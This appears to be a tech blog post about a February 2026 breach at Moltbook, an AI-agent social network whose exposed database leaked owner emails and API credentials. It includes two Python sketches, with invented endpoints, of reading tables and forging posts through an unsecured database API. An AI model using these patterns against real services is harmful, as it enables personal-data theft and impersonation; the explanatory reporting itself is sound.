Automation Disaster

When the robots take over… and immediately break everything.

Moltbook: The AI-Only Social Network That Leaked 6,000 Users’ Data

February 2, 2026 — A new social network designed exclusively for AI agents to communicate with each other has suffered a major security breach, exposing the private data of over 6,000 real people and more than a million API credentials.

What Happened

Moltbook, a Reddit-like platform marketed as a “social network built exclusively for AI agents,” inadvertently left its database completely exposed, according to research published by cybersecurity firm Wiz. The vulnerability allowed anyone to access:

  • Private messages exchanged between AI agents
  • Email addresses of over 6,000 human owners
  • More than one million API credentials
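
Wiz's write-up describes the flaw as an exposed database rather than a broken login flow. As a concrete illustration of that class of bug, here is a minimal sketch of how an unauthenticated client can dump records from a hosted database whose REST API enforces no access rules. The endpoint, key, and table names are invented for this example; the reporting above does not name Moltbook's actual stack.

```python
# Hypothetical sketch: reading from an exposed hosted-database REST API.
# The URL, key, and table/column names are invented for illustration;
# nothing here reflects Moltbook's real endpoints.
import requests

BASE_URL = "https://example-project.db.example.com/rest/v1"
PUBLIC_KEY = "public-anon-key"  # the key every browser client already receives

headers = {
    "apikey": PUBLIC_KEY,
    "Authorization": f"Bearer {PUBLIC_KEY}",
}

# With no row-level access rules, the same key that renders the site
# can read entire tables: owner emails, agent messages, stored API keys.
resp = requests.get(f"{BASE_URL}/owners?select=email", headers=headers, timeout=10)
resp.raise_for_status()
print(f"rows returned: {len(resp.json())}")
```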

The site, which launched just last week, was created as a place where AI agents (primarily OpenClaw bots) could “compare notes” about their work or simply “shoot the breeze” with one another. The platform gained rapid popularity among AI enthusiasts after viral social media posts suggested the bots were trying to find private ways to communicate.

The Vibe Coding Problem

Moltbook’s creator, Matt Schlicht, championed the practice of “vibe coding” — using AI to write code rather than coding manually. In a post on X, Schlicht admitted he “didn’t write one line of code” for the site.

“As we see over and over again with vibe coding, although it runs very fast, many times people forget the basics of security,” said Ami Luttwak, cofounder of Wiz.

The vulnerability was a classic database misconfiguration that allowed anyone — bot or human — to post to the site without any identity verification. As one security researcher noted, Moltbook’s popularity “exploded before anyone thought to check whether the database was properly secured.”
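
The write side of the same misconfiguration is what made the exposure dangerous rather than merely embarrassing: if the database accepts inserts with no identity check, any HTTP client can publish as any agent. A minimal sketch, using the same invented endpoint and field names as above:

```python
# Hypothetical sketch: writing to the same exposed API without any
# identity verification. Endpoint and field names are invented.
import requests

BASE_URL = "https://example-project.db.example.com/rest/v1"
PUBLIC_KEY = "public-anon-key"

headers = {
    "apikey": PUBLIC_KEY,
    "Authorization": f"Bearer {PUBLIC_KEY}",
    "Content-Type": "application/json",
}

# Nothing ties this request to a real agent: the server simply accepts
# whatever agent_id the client claims.
forged = {"agent_id": "someone-elses-bot", "body": "written by a human, not a bot"}
resp = requests.post(f"{BASE_URL}/posts", json=forged, headers=headers, timeout=10)
print(resp.status_code)  # a misconfigured table answers 201 Created
```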

Why It Matters

This incident highlights a dangerous pattern emerging in the AI boom:

  • Speed over security: AI-generated code enables rapid deployment, but fundamental security practices are being skipped
  • Automation amplifies mistakes: When AI systems interact with each other on insecure platforms, a single flaw can cascade across every connected agent
  • Privacy at scale: A single configuration error exposed data from thousands of users and over a million credentials

The incident raises serious questions about the security of AI agent ecosystems. If platforms designed for AI-to-AI communication can’t secure basic database configurations, what happens when these agents begin handling sensitive financial transactions, medical data, or critical infrastructure?

Current Status

Wiz reported that the vulnerability was fixed after the firm contacted Moltbook. Even so, the incident serves as a warning for the broader AI agent ecosystem. With companies racing to deploy autonomous AI systems, the Moltbook breach demonstrates how quickly enthusiasm for new technology can outpace essential security measures.

The episode also underscores a fundamental irony: in building platforms for AI agents to communicate, humans are creating new attack surfaces that may be even more vulnerable than traditional human-focused systems.


Sources

  • Reuters, “‘Moltbook’ social media site for AI agents had big security hole, cyber firm Wiz says,” February 2, 2026
  • Wiz Security Research Blog, “Exposed Moltbook Database Reveals Millions of API Keys,” February 2, 2026
  • 404 Media, “Exposed Moltbook Database Let Anyone Take Control of Any AI Agent on the Site,” February 2026